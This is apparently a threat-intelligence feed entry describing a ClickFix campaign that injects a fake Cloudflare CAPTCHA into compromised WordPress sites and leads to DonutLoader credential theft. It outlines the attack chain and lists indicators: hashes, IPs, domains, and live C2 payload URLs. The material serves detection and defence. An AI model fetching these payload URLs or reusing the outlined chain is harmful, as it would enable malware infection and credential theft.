← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
ClickFix-as-a-Service platform with fake Cloudflare CAPTCHA using compromised WordPress sites using a DOM overlay
WHITE dispensight 2026-05-20 Modified: 2026-05-20
105
IOCs
HIGH VOLUME
TLP:GREEN | SL-ADV-2026-WP-001 UNIFIED March 20 – May 19, 2026 ClickFix/TDS cluster active since March 2026. Compromised WordPress sites inject an obfuscated JS loader that fires a synchronous XHR to a TDS C2 (ntdnewtds.shop / dnsnewtds.shop / sdntds.shop), fetches a remote payload, and executes it inline. Victims see a fake Cloudflare CAPTCHA (Shadow DOM, 50-language localized) that silently writes a PowerShell command to clipboard. PS chain: IRM stage1 → IWR stage2 → csc.exe compiles Rozena DLL → svchost injection → DonutLoader C2 (158.94.208.104) → browser/Firefox/crypto wallet credential theft → self-delete. Parallel Python chain (Protected.py) uses direct NT syscalls for EDR bypass. Per-campaign C2 IPs, segmented DonutLoader payloads (my_ / student_), and a 6-domain TDS pool suggest a ClickFix-as-a-Service affiliate platform. 4 JS variants documented March–May 2026. SecureLeaf · Dispensight Security Research · SL-ADV-2026-WP-001 rev. 3.0 STIX 2.1 · 438 objects · 4 variants · 2 execution chains
clickfixevasionDonutLoaderTR.Rozena.geninfostealerprotected.pyAS202412iexinjectordropper
MITRE ATT&CK & Malware Families
ATT&CK TECHNIQUES
MALWARE FAMILIES
Donutloader TR/Rozena.Gen
Indicators of Compromise (105)
All CIDR FileHash-MD5 FileHash-SHA1 FileHash-SHA256 IPv4 URL domain hostname
TYPEINDICATORDESCRIPTIONCREATED
CIDR 178.16.53.0/24 2026-05-20
FileHash-MD5 09d8e272484c2bef81590887460981ff 2026-05-20
FileHash-MD5 25e90438c448898c2b8fa0814ccbd0c8 2026-05-20
FileHash-MD5 4f67ea9205c3ca7c9e04582d3b9bdd1d MD5 of 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 2026-05-20
FileHash-MD5 51b46342163ef37f5f41c269ffb337d3 MD5 of 724a8445c5c3fd57778d82f62b9d4a6112a3bb2d 2026-05-20
FileHash-MD5 7c268bfab0653cdca45b4dc3c1ee0092 MD5 of f1542a7697e04865e1dfeeed084e5ea5870100f0 2026-05-20
FileHash-MD5 c43c4bfd2e1a44ef690e6801be2b4099 2026-05-20
FileHash-MD5 c67211d946c6762bbef2afdb74c63416 2026-05-20
FileHash-MD5 f29926ae72794dde60ae1d57d97c5781 2026-05-20
FileHash-MD5 ff1d1a915f7a4a1df4a16e0dd2990241 2026-05-20
FileHash-SHA1 1389676a4641ef8e3b4790cf06063249d411a692 2026-05-20
FileHash-SHA1 39676ea0b0640b4db29d0f93845d702b3784985a 2026-05-20
FileHash-SHA1 724a8445c5c3fd57778d82f62b9d4a6112a3bb2d 2026-05-20
FileHash-SHA1 750146d79df2f7e02b6895527d982b4de952ab94 2026-05-20
FileHash-SHA1 85590cac2455a48ef1231a27dca94294de292b96 2026-05-20
FileHash-SHA1 abc92bc7fcb91e4122ebe93c4ea0d35b0e5bbce5 2026-05-20
FileHash-SHA1 ca03486f14ec38cd5ed6377fe6f56c1a5713a44a 2026-05-20
FileHash-SHA1 d3b68ad3eb88d3db3d843211d4905143c3bff281 SHA1 of 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 2026-05-20
FileHash-SHA1 dcfb29698a73656e60a329274ecc5833f92517ad 2026-05-20
FileHash-SHA1 e221c94adb02cc387bcbf9265c1769f36c59cce5 2026-05-20
FileHash-SHA1 f1542a7697e04865e1dfeeed084e5ea5870100f0 2026-05-20
FileHash-SHA1 f7836ce43c5f137fdd793d37c0ad3c17ab4ec9f0 2026-05-20
FileHash-SHA256 1d9d37f90fa60b93647a845ff39f64ff7e7f71f6f2a576780fbe974064a907b1 2026-05-20
FileHash-SHA256 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810 SHA256 of 724a8445c5c3fd57778d82f62b9d4a6112a3bb2d 2026-05-20
FileHash-SHA256 2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896 2026-05-20
FileHash-SHA256 339e0e018b48a118c36c0b7181b143c255ebad19c5f628a1a57903592f07df94 2026-05-20
FileHash-SHA256 4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5 2026-05-20
FileHash-SHA256 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 2026-05-20
FileHash-SHA256 6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d 2026-05-20
FileHash-SHA256 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9 SHA256 of f1542a7697e04865e1dfeeed084e5ea5870100f0 2026-05-20
FileHash-SHA256 b04f539c7bbb9133d2f801bfce73ec84ad3cc33768685ca415113f622db90168 2026-05-20
FileHash-SHA256 b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937 2026-05-20
FileHash-SHA256 ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff 2026-05-20
IPv4 158.94.208.104 CC=GB ASN=AS786 jisc services limited 2026-05-20
IPv4 158.94.208.92 CC=GB ASN=AS786 jisc services limited 2026-05-20
IPv4 178.16.52.232 CC=DE ASN=AS40999 dus.net gmbh 2026-05-20
IPv4 91.92.240.117 CC=BG ASN=AS34368 zonata - natskovi & sie ltd. 2026-05-20
IPv4 91.92.240.121 CC=BG ASN=AS34368 zonata - natskovi & sie ltd. 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/ 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/'] 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin'] 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin'] 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/my_s.bin'] 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/student_downloader.bin'] 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin'] 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin'] 2026-05-20
URL http://158.94.208.104:80 2026-05-20
URL http://158.94.208.92 2026-05-20
URL http://91.92.240.117/'] 2026-05-20
URL http://91.92.240.117/121 2026-05-20
URL http://91.92.240.121 2026-05-20
URL http://91.92.240.121/'] 2026-05-20
URL http://captioto.com/cptoptious.com/newtdsone.shop 2026-05-20
URL http://cptoptious.com/captcha.htm'] 2026-05-20
URL http://cptoptious.com/captcha.html'] 2026-05-20
URL http://cptoptious.com/jsrepo'] 2026-05-20
URL http://dnsnewtds.shop/jsrepo 2026-05-20
URL http://ntdnewtds.shop/jsrepo 2026-05-20
URL http://ntdnewtds.shop/jsrepo?rnd= 2026-05-20
URL http://ntdnewtds.shop/jsrepo?rnd='] 2026-05-20
URL http://sdntds.shop/teamrepo 2026-05-20
URL http://www.captioto.com/'] 2026-05-20
URL http://www.cptoptious.com/'] 2026-05-20
URL http://www.dnsnewtds.shop/'] 2026-05-20
URL http://www.kamisisterbrofanydodf.com/'] 2026-05-20
URL http://www.newtdsone.shop/'] 2026-05-20
URL https://captioto.com/jsrepo'] 2026-05-20
URL https://cptoptious.com/automail-insurtech-tax.de'] 2026-05-20
URL https://cptoptious.com/jsrepo'] 2026-05-20
URL https://cptoptious.com/teamrepo'] 2026-05-20
URL https://cptoptious.com/url='] 2026-05-20
URL https://dnsnewtds.shop/...'] 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/'] 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/*'] 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/1389676a4641ef8e3b4790cf06063249d411a692.svg'] 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/39676ea0b0640b4db29d0f93845d702b3784985a.svg'] 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/750146d79df2f7e02b6895527d982b4de952ab94.svg'] 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/ca03486f14ec38cd5ed6377fe6f56c1a5713a44a.svg'] 2026-05-20
URL https://ntdnewtds.shop/jsrepo'] 2026-05-20
URL https://ntdnewtds.shop/jsrepo/'] 2026-05-20
URL https://sdntds.shop/teamrepo?rnd=0.3905751823084034&ts=1779127243826'] 2026-05-20
URL https://sdntds.shop/teamrepo?rnd=0.5058000373016334'] 2026-05-20
URL https://www.captioto.com/'] 2026-05-20
URL https://www.cptoptious.com/'] 2026-05-20
URL https://www.dnsnewtds.shop/'] 2026-05-20
URL https://www.kamisisterbrofanydodf.com/'] 2026-05-20
URL https://www.newtdsone.shop/'] 2026-05-20
domain captioto.com 2026-05-20
domain caravan-crm-lu.com 2026-05-20
domain cptoptious.com 2026-05-20
domain dnsnewtds.shop 2026-05-20
domain kamisisterbrofanydodf.com 2026-05-20
domain newtdsone.shop 2026-05-20
domain ntdnewtds.shop 2026-05-20
domain obfuscator.io 2026-05-20
domain sdntds.shop 2026-05-20
hostname blksssd.ydns.eu 2026-05-20
hostname gettrumpmemes.gettrumpmemestrendingtokens.com 2026-05-20
hostname www.captioto.com 2026-05-20
hostname www.cptoptious.com 2026-05-20
hostname www.dnsnewtds.shop 2026-05-20
hostname www.kamisisterbrofanydodf.com 2026-05-20
hostname www.newtdsone.shop 2026-05-20
domain gettrumpmemestrendingtokens.com hardcoded replacement / spare domain 2026-05-20
domain dntds.shop Route Summary: Host dntds.shop Prefix 178.16.53.0/24 Hops 1 (partial) ---> AS202412 Link structure: dntds.shop/jsrepo?rnd=<random> 2026-05-20
References (2)
↗ STIX.json ↗ https://secureleaf.dispensight.com/sink.html